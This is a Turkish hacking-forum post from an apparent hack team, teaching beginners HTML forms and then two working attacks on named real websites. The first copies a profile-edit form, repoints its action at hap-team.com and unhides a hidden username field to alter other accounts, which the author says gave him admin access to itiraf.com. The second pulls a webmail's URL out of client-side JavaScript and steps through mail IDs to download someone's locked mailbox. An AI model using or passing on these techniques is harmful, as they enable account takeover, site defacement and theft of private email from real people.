MySouLNeedLove
New member
Kod:
SelamunAleykum arkadaslar..
Sizlere bazi gerçeklerden bahsedecegim.. hacker olmak istiyorsaniz bazi seyleri biliyor olmaniz gerekiyor.. hacker olmak nedir ? açiklar bulmaktir.. açik bulmak için açik bulunacak sistemin çok iyi idrak edilmesi üzerinde çok iyi çalisilmasi gerekiyor.. bütün bunlar bir yana birazda progamlama temeli olmasi gerekiyor.. Simdi arkadaslar yöneticiler olarak biraz bu konuyu konustuk tartistik ve sonuç olarak pek iyi olmayan bir sonuca ulastik.. Takimdaki arkadaslar (hack ögrenmek amaçli gelen) \'in %70 gibi büyük bir orani temel kavramlardan habersiz.. nasil yani.. simdi sistemi tam bilmeniz gerekiyor dedik.. bir web sitesi hack edecekseniz web sitesi sistemini bilmeniz gerekiyor.. nasil bir web sitesi ? öncelikle bunu bilmemiz gerekiyor.. siteye giriyoruz ve asp ile yapilmis oldugunu görüyoruz.. hmm düsünelim o zaman ne yapabiliriz ? iste bu devrede biraz asp bilgisi gerekiyor.. dedimya eger birsey yapmak istiyorsak öncelikle o konu hakkinda bilgili olmamiz gerekiyor.. diyelimki asp de biliyoruz.. o zaman sitenin html (client kodlari) de biraz gezintiye çikariz.. kodlardan korkmayin nihayetinde onlarda insan elinden çikiyor :) daha sonra asp ile baglantili birseyler yapabilme ihtimali olup olmadigina bakariz.. arkadaslar simdi hep yüzeysel geçiyorum farkindayim ancak anlatacaklarim biraz uzun :) o yüzden ayrintiya sonra inecegim..
Öncelikle yukarida da bahsettigim gibi sistemi iyi bilirseniz açiklari rahat görürsünüz.. burada ne çikiyor karsimiza ? hackerlik aslinda sistemleri iyi taniyan insanlarin yapabilecegi bir is.. öyle her önüne gelen yapamaz bunu.. arkadaslar bunlari neden diyorum? yanlis yoldayiz aslinda.. hackerlik diye bir meslek yoktur.. hackerlik birinci basamak degildir! öncelikle sistemleri iyi bilen arkadaslar kendi alanlarinda hackerlik yapabilirler.. bir nevi master yapmak gibi bisey :) benim sizlere önerim sudur ki : burada bizlere windows ile ilgili sorular sorun, linux ile ilgili sorular sorun, su sekilde bir web sitesini yapiyorum burasinda takildim nasil yaparim gibisinden sorular sorun.. arkadaslarimizin çogu su siteyi nasil hackleriz gibisinden yaklasiyor.. simdi böyle bir durumda bizim bisey anlatmamiz mümkün degil.. ama bazi arkadaslar var.. haberlerini aliyoruz cw daki forumda yazilanlarin print çiktisini alip çalisiyorlar deniyorlar.. daha sonra takildiklari yerde gelip soruyorlar.. tek kelime ile alnindan öpüyorum o kardeslerin :)) eger yaklasim bu sekilde olursa bildigimiz birsey olupda sizlerle paylasmamamiz söz konusu bile degildir!
Simdi sizlere bir hack yönteminden bahsetmek istiyorum.. genelde asp destekli üye sistemli sitelerde karsilastigim bu açigi kendim bulmustum ancak her html ve asp bilen biraz düsünürse bunu bulabilir, yani baska yerlerde de böyle bir açiktan bahsedilmis olabilir.. simdi öncelikle bu hack yöntemi için bir ön bilgi olarak html dersi verecegim :) ucunda hackerlik olunca anca çalisiyorsunuz napim :)) arada biraz böyle dersler verelim bilmeyen arkadaslarda bu bahane ile ögrensinler :)))
simdi genel olarak internet üzerinde doldurdugunuz tüm formlar biryere post edilir yani gönderilir.. gönderildigi yer bunu isler ve kaydetmesi gerekiyorsa kaydeder.. mesela siz bir web sayfasina login olurken kullanici sifre gibi bilgileri girersiniz.. bu bilgiler bir dosyaya post edilir ve o dosya da database e baglanarak böyle bir kullanici olup olmadigina sifresinin tutup tutmadigina bakar.. bunlarin hepsi tutarsa ona göre bir yönlendirme yapar.. öncelikle bir form yapisini görelim..
[CODE]<form action="guncelle.asp" method="post">
<input type=text name="kullaniciadi">
<input type=password name="kullanicisifre">
<input type=submit name="smtGiris" value="Giris">
</form>simdi bu form yapisinda post edilen yani verilerin gönderildigi dosya "guncelle.asp" olarak belirlenmis. "type=text" demek bir text kutusu demektir.. buralara kullanici bilgileri giriliyor.. "type=password" demek ise yine bir text kutusu açiyor ancak girilen deger "*" karakteri ile gösteriliyor. en son olarak da "type=submit" var.. bu da bir button çikarir sayfada.. bu buttonun görevi tiklandiginda textkutularina girilen degerleri form action kisminda yazan dosyaya yani guncelle.asp dosyasina göndermesini saglar.. simdi arkadaslar birde forumlarda "type=hidden" kullanilir.. bu su demektir, sayfada gözükmeyen ve içinde veri barindiran inputlar.. sayfada gözükmüyor.. ancak "View Sorce" (Kaynagi görüntüle) dendiginde bu gözükecektir.. simdi arkadaslar bunu nasil kullanabiliriz biraz düsünelim.. simdi eger webmaster siteyi kendisi yaptiysa, kodlari kendisi yazdiysa yani bir nuke degilse (nukelerde bunlarin önlemi aliniyor.. o adamlar profosyonelce yaziyorlar kodlari) bu açik %80 var
kullanici bilgilerini degistirme bölümünü bilirsiniz.. profil düzenle falan diye de geçer bazi yerlerde.. hapteam ve itiraf.com dan bahsetmek istiyorum.. evet bu sitelerde bu açik vardi.. simdi yok.. o zaman hapteam ile aramiz nanelimonluydu biliyor herkes olaylari simdi gayet iyiyiz yaptigim is öncelikle sitelerine üye oldum.. sonraki adim profil düzenle bölümüne girdim.. sayfanin kaynak koduna girdim.. aynen söyleydi :
Kod:
<form action="default.asp?hp=uyeislem&islem=kayit" method="Post">
<input type=hidden name="kullanici" value="zehir">
<input type="text" name="uye_adi" size="20" value="Zeber">
<input type="password" name="uye_sifresi" size="20" value="123456789">
<input type="text" name="uye_sifre_sorusu" size="20" value="kerata seni">
<input type="text" name="uye_sifre_cevabi" size="20" value="bunlara bakmayin salliyorum :D">
<input type="text" name="uye_eposta" size="20" value="Mail Adresi">
<input type="text" name="uye_web_site" size="20" value="http://www.hackhell.com">
<input style="background-color: #f6f6f6;" style="border:1px" type="submit" value="Güncelle">
</form>evet simdi kabataslak karsima çikan bu tabloda
<input type=hidden name="kullanici" value="Zeber">
böyle bir satir var.. bu ne demek oluyor ? bu su demek oluyor ki, kullanici adi sayfada gösterilmiyor ama burada gizli olarak sayfanin arkasinda tutuluyor.. ve buradan post edilerek diger sayfada bu kullanici adina ait bilgileri degistiriyor.. evet ben ne yaptim biliyormusunuz ? bulari bir htm dosyasi olusturdum ve içine koydum.. daha sonra formun action kisminda direk default.asp diyor onun basina "http://www.hap-team.com/" ekledim. asagidaki gibi oldu..
Kod:
<form action="http://www.hap-team.com/default.asp?hp=uyeislem&islem=kayit" method="Post">
simdi type=hidden olan inputun type ini hidden degilde text yapiyorum.. asagidaki gibi oluyor..
<input type=text name="kullanici" value="Zeber">
Kod:
<form action="http://www.hap-team.com/default.asp?hp=uyeislem&islem=kayit" method="Post">
<input type=text name="kullanici" value="zehir">
<input type="text" name="uye_adi" size="20" value="Zeber">
<input type="password" name="uye_sifresi" size="20" value="123456789">
<input type="text" name="uye_sifre_sorusu" size="20" value="kerata seni">
<input type="text" name="uye_sifre_cevabi" size="20" value="bunlara bakmayin salliyorum :D">
<input type="text" name="uye_eposta" size="20" value="Mail Adresi">
<input type="text" name="uye_web_site" size="20" value="http://www.hackhell.com">
<input style="background-color: #f6f6f6;" style="border:1px" type="submit" value="Güncelle">
</form>itiraf.com a da ayni sekilde girmistim.. admin sifresini aldim birçok yaziyi istedigim gibi editledim
müstehcen seyler vardi düzelttim hepsini ancak adminler kisa sürede farkedip siteyi kapattilar 1 gün kadar. daha sonra açtiklarinda böyle bir açik yoktu )) üzüldümmü? hayir.. bisey yapmak isteseydim o zaman yapardim elimdeydi hersey.. ama hersey zarar vermek degildir.. sunu unutmayin! bilgilendiginiz zaman hacklemenin degilde yardim etmenin, açiklari site sahiplerine bildirmenin daha güzel huzur verici oldugunu göreceksiniz.. umarim bu günler yakin olur.. parmaklarim yoruldu arkadaslar hakkinizi helal edin birazda uzun oldu ama Dualarinizi esirgemeyin..
Kod:
bu arada unutmadan egitim için önerecegim siteler :
face=Courier New, Courier, mono [url]www.maxiasp.com[/url]
face=Courier New, Courier, mono [url]www.aspnedir.com[/url]
face=Courier New, Courier, mono [url]www.yazgelistir.com[/url]
face=Courier New, Courier, mono [url]www.planetsourcecode.com[/url] - Bol bol örnekler bulabilirisniz..Selam ve Dua ile..
iP Team - MySouLNeedLove
iP / Zeber- Hack TIM
Kod:
Arkadaslar geçenki yazimi baktimki çok kisi beyenmis :) yada beyenmeyen yok desek yeridir. Bende dedim bir yazi daha yazim :) Simdi isleyisi biraz degistirecegiz. Nasilmi ? bu sefer ben soracagim.. bilenler, aklina bisey gelenler bana mail atacaklar. Bilmeyenler ise buraya konunun devamina ben bilmiyorum seklinde yazacaklar.. sonunda ben sorumun cevabini anlatacagim sizlere.. bunu bu sekilde yapiyorum ki benim düsünmem sizin isinize yaramaz.. önemli olan sizin düsünmeniz.. öyle degilmi :)
Soru :
basimiza geldi onun için yaziyorum.. face=Courier New color=#0000ff http://www.ilhanarsel.org/webmail dedigimizde kullanici giris ekrani geliyordu.. kullanici adini sifre girildikten sonra bize inboxu açti.. ancak bir problem vardi.. mailin kapasitesi 4mb ama mailin sahibi hiçbir maili silmemis.. gelen kutusunda 32mb mail birikmis.. artik mail kitlenmis.. mailleri okutmuyor.. tiklandiginda diyorki ilk önce mailleri silin ondan sonra maillerinizi açabilirsiniz.. bütün mailler benim için hayati önem tasiyor olabilir. Içine sifre olma ihtimali çok yüksek.. simdi böyle bir durumla karsilasirsaniz ne yapabilirsiniz ? evet sizlerinde tahmin ettigi gibi biz bu problemide astik.. ve mail adresindeki tüm mailleri aldik :) biraz kurnazlik düsünmeniz gerekiyor.. aslinda site açilsa sifreyi vercem deneyin diyecem ama :) bu arada maillerin üzerine geldigimde status bar da
javascript:Runmail(true,12,25)
seklinde bir yazi çikiyordu..
iyice düsünün cevaplarinizi bekliyorum.. mail adresimi bilmeyen yoktur ama ben genede yazayim : face=Courier New color=#[email protected]
farkediyorsaniz hacking denilen olay sadece ftp domain mail gibi seylerden ibaret degildir.. ortada bir engel,varsa bunu asmak hacking dir.. adam ben bunu önledim diyor sen dalga gecer gibi önledigi seyin önüne geçiyorsun.. birnevi adami hiçe sayiyorsun.. degisik konulardan olsunki akliniz tek yere odaklanip kafa patlatmayin.. sakin bir biçimde yavas yavas beraber ögrenecegiz :)
Dualarinizi esirgemeyin..
bu arada unutmadan egitim için önerecegim siteler :
www.maxiasp.com
www.aspnedir.com
www.yazgelistir.com/SPANSPAN style=font-SIZE: 10pt; COLOR: black; font-FAMILY: Courier New "> face=Courier New color=#008000 BRwww.planetsourcecode.com - Bol bol örnekler bulabilirisniz..
Yada
nukeshore kardes o kadar çok yaklastinki nerdeyse buldun yani :)
mantiksizlik :) belkide böyle olmasi gerekiyor.. bakin simdi.. HTML sayfalari ile ilgilenen arkadaslar, HTML ile JAVASCRIPT in nasil bir iliski içerisinde oldugunu bilirler..
örnek olarak:
<HTML>
<HEAD>
<TITLE>DENEMEDIR</TITLE>
</HEAD>
<SCRIPT LANGUAGE=JAVASCRIPT>
function runMail(a,b,c){
}
</SCRIPT>
<BODY>
<a onClick="runMail(true,1,2)">mail oku!</a>
</BODY>
</HTML>
Simdi bu kodda neler var bir bakalim öncelikle.. <script></script> tagini herkes görüyor heralde degilmi:) simdi bu tag içerisine browserin destekledigi dillerde progr*yasak kelime*lar yazilir.. default olarak Client ta çalisan bir koddur.. içerisinde bir function var. Bu functionun adi runMail ve 3 tane parametre almakta.. alinan parametreler içerisinde hiçbir adres yok.. yani adresten kastim http://www Seklinde bir adres.. o halde bütün hersey bu runMail fonksiyonunun içerisinde yeraliyor.. adres dahil.. sonucta tikladigimizda bir adrese gidecek degilmi? :) mantikli düsününce sonuca ulastik.. runMail fonksiyonunun içerisinde adres vardi.. bizde onu aldik.. fonksiyon ne ise yariyor diyeceksiniz? Gönderilen parametrelerden ilki true-false degerleri aliyor.. bunuda mailin kapasitesinin dolup dolmadigini ayirt ediyor.. eger dolmus ise true veriyor.. sonra runMail in içinde kontrol ediyor eger true ise maili açmiyor:) aslinda mantikli degilmi? Ama adamlarin mantiksiz yaptiklari sey bunu client a vermeleri.. iste böyle asilabilir clienta verirlerse.. bu arada gönderilen diger parametrelerden biride mailin numarasini tutuyor.. mesela 120 tane mail var.. son mailin numarasi 120 oluyor.. simdi arkadaslar biz runMail içinden asagidakine benzer bir adres satirini aldik..
face=Courier New color=#0000ff http://www.deneme.com/webmail/mailoku.cgi?asds=Asdvgjkdfjsdfkvlfhv&mailid=5
gibi.. burda en sondaki mailid mailin numarasini tutuyor.. bunu aldik ve ufak bir program yazdik.. bu program tüm mailleri yükledi.. toplam 100 ün üzerinde mail gelmis ve hepsini 4-5 dk içerisinde yükledik.. malum bu islerde hizli olmak gerekir ;)
Arkadaslar hakkinizi helal edin dualarinizi esirgemeyin bu mübarek ayda. Biraz kendinizi programlamaya verin.. programci olun demiyorum.. en azindan mantigini yazilisini bilseniz yeter.. hayatimda hiç C ile kod yazmadim ancak karsima çikan kodlarin ne ise yaradigini anliyorum.. hatalarini ayikliyorum.. isin özünü ögrenin inanin çok rahat edeceksiniz!.. bunu hackerlik için degil eger bir bilgisayar kullanicisi iseniz bilmeniz gereken seyler bunlar..
Binler muhabbetle..
Zeber
iP / MySouLNeedLove Hack Tim
